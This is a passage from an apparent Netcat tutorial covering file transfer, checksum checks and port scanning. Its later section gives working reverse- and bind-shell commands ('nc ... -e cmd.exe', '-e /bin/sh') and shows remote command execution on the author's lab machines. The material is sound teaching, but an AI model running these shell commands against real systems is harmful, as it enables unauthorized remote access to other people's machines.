Ncat: Listening on 0.0.0.0:4000

Now let’s connect the client to the server and push the file:

nc -v 192.168.145.131 4000 < nooblinux_assets.zip

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.145.131:4000.
Ncat: 245394 bytes sent, 0 bytes received in 7.04 seconds.

This method works much better than the previous. It closes the connection as soon as the file is transferred.

So, you know that the file was successfully transferred and don’t have to worry about unfinished file transfer.

Checking if the file transfer was successful

You can check if the file you downloaded was finished transferring properly or if it is not the same file you wanted to download.

Checking the checksum of the file will reveal if the files are the same or not.

A simple way to do this is using the md5sum tool which uses the md5 hash algorithm.

On Windows you have md5sum.exe and you can run it like in the following examples, but only replace md5sum with md5sum.exe.

In my case,run the commands on each of the files (the original one and the received one) so you can check if the resulting checksums are identical.

md5sum nooblinux_assets.zip

3ba304b2acf42467b68ee9df05e5883e *nooblinux_assets.zip

md5sum whatever.zip

3ba304b2acf42467b68ee9df05e5883e  whatever.zip

If the hashes match up then they are the same file. This is a very simple yet quite effective method to check if the file transferred successfully.

That’s why you’ll see many websites provide the checksums of their files so you can crosscheck if you downloaded the same file or not. This is very important since hackers can alter your download with a malicious file.

Scanning ports with traditional Netcat

The traditional Netcat gives you the option to perform basic port scanning.

As we mentioned in the beginning of this tutorial, Ncat lacks this feature, since it’s “big brother”, Nmap, already has advanced port scanning capabilities.

If you’d like to learn more about it, you can check our comprehensive tutorial on how to use Nmap.

On Netcat, you can use the -z flag that doesn’t include the input/output and only tries to connect to the ports and finds out which ones are open.

Let’s scan a single port:

netcat -vz nooblinux.com 443

Connection to nooblinux.com 443 port [tcp/https] succeeded!

To scan a range of ports, use the following syntax. The “-w” flag tells it to wait for the seconds specified after it. In this case, it’ll wait 1 second for each request –

netcat -vzw1 scanme.nmap.org 20-25

netcat: connect to scanme.nmap.org port 20 (tcp) timed out: Operation now in progress
netcat: connect to scanme.nmap.org port 20 (tcp) failed: Connection refused
netcat: connect to scanme.nmap.org port 21 (tcp) timed out: Operation now in progress
netcat: connect to scanme.nmap.org port 21 (tcp) failed: Connection refused
Connection to scanme.nmap.org 22 port [tcp/ssh] succeeded!
netcat: connect to scanme.nmap.org port 23 (tcp) timed out: Operation now in progress
netcat: connect to scanme.nmap.org port 23 (tcp) failed: Connection refused
netcat: connect to scanme.nmap.org port 24 (tcp) timed out: Operation now in progress
netcat: connect to scanme.nmap.org port 24 (tcp) failed: Connection refused
netcat: connect to scanme.nmap.org port 25 (tcp) timed out: Operation now in progress
netcat: connect to scanme.nmap.org port 25 (tcp) failed: Connection refused

As you can see from the output, port 22 (ssh) is open.

You can also scan UDP ports using the -u flag:

nc -vzuw1 scanme.nmap.org 20-25

Hacking with Netcat

Hackers and penetration testers often use Netcat to get shell access in a remote system.

If you have a machine with remote code execution capabilities, you can use Netcat to create a reverse shell or a backdoor in that machine.

This allows you to execute commands as a user on that machine.

There are two ways to do this. You can either:

1. create a reverse shell
2. create a bind shell

Reverse Shell

In a reverse shell, the attack machine listens on a specific port and the target machine initiates a shell and connects to the attack machine.

Bind Shell

In the bind shell, the target machine initiates the shell and listens to a port. The attacker machine connects to the target machine and gets shell access.

Notice: We’ll be using the -e flag on Ncat to execute after connection. If you see the -e flag is not supported in the version of Netcat you’re using, install another one.

Creating a Reverse Shell using Netcat

To create a reverse shell with Netcat, start a server with any port listening on the attacking machine. You’ll then connect to it from the target machine. Then you’ll be able to execute commands on the target machine from the attacking machine.

I’ll use a Windows 10 machine and an Ubuntu 20.04 machine and try it both ways. The difference will be that when we execute remote code on Windows, we’ll use Windows Command Prompt cmd.exe instead of the Bourne shell sh.

Let’s see how that works.

Attacker: Linux / Target: Windows

Run the following command on the attacking machine (you can use another port, I’ll use 4000):

nc -vlp 4000

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4000
Ncat: Listening on 0.0.0.0:4000

Now connect from the target machine with the shell access using the -e flag:

nc -v 192.168.145.131 4000 -e cmd.exe

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.145.131:4000.

On the attacking machine, you’ll see the connection message:

Ncat: Connection from 192.168.145.1.
Ncat: Connection from 192.168.145.1:19095.
Microsoft Windows [Version 10.0.19042.1083]
(c) Microsoft Corporation. All rights reserved.

D:\Downloads>

I ran the command from the D:\Downloads>.

Now you can type in some commands in the attack machine, and you’ll get replies from the target machine shell:

D:\Downloads>whoami

whoami
desktop-0i9jobe\shway

Here, I typed in the whoami command to see the current user (whoami also works on Windows 10). As you can see, it’s desktop-0i9jobe\shway. That’s my desktop name and username.

Let’s execute more commands:

D:\Downloads>ls

nooblinux_assets.zip
some_wallpaper.png
an_emoji.png
verification.jpeg
rufus.exe

You can execute commands on the target machine using the reverse shell like this from the attack machine.

Attacker: Windows / Target: Linux

Now let’s execute code remotely from Windows on Linux.

First we again create a server on our attacking machine, which is the Windows machine in my case (use the port of your choice):

nc -vlp 4000

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4000
Ncat: Listening on 0.0.0.0:4000

And we’ll connect from the target machine (the Linux machine):

nc -v 192.168.100.16 4000 -e /bin/sh

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.100.16:4000.

You won’t see any prompt symbol, but now we should be able to execute commands from the Windows machine and onto the Linux machine.

whoami

ed

My user on the Linux machine is ed, so that’s correct.

hostname

nooblinux

We can execute many more commands but that is beyond the scope of this tutorial. I hope the above examples have given you an idea of what you can do.

Creating a Bind Shell with Netcat

Bind shell achieves the same purpose as the reverse shell. However, the process to create a bind shell is the opposite.

To create a bind shell, setup the target machine to listen on a port with shell access. As before, you will have to mention the appropriate command line interpreter. On Linux you can typically go with /bin/sh and on Windows with cmd.exe.

We won’t go into Linux->Windows, Windows->Linux scenarios such as we did for the reverse shell, but a simple example should give you a good idea of how to go about it both ways.

nc -vlp 4000 -e /bin/sh

nc -vlp 4000 -e cmd.exe

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4000
Ncat: Listening on 0.0.0.0:4000

After that, you just have to connect to the target from the attack machine:

nc -v 192.168.145.131 4000

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.145.131:4000.

Now you can execute commands from the attack machine. Remember, you may not see a prompt symbol, but you can execute commands normally.

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.145.131:4000.
whoami
ed
pwd
/home/ed
ls
file
file.log
file.log.save
file.txt
master_downloaded.zip
master_serve.zip

Conclusion

In this tutorial, we covered the fundamentals of the Netcat utility. We hoped that you liked it and that it was easy to read and understand. You can learn more about Ncat from the Ncat Users’ Guide on Nmap.org. If you have any problems feel free to leave a comment or contact us and we’ll get back to you as soon as possible.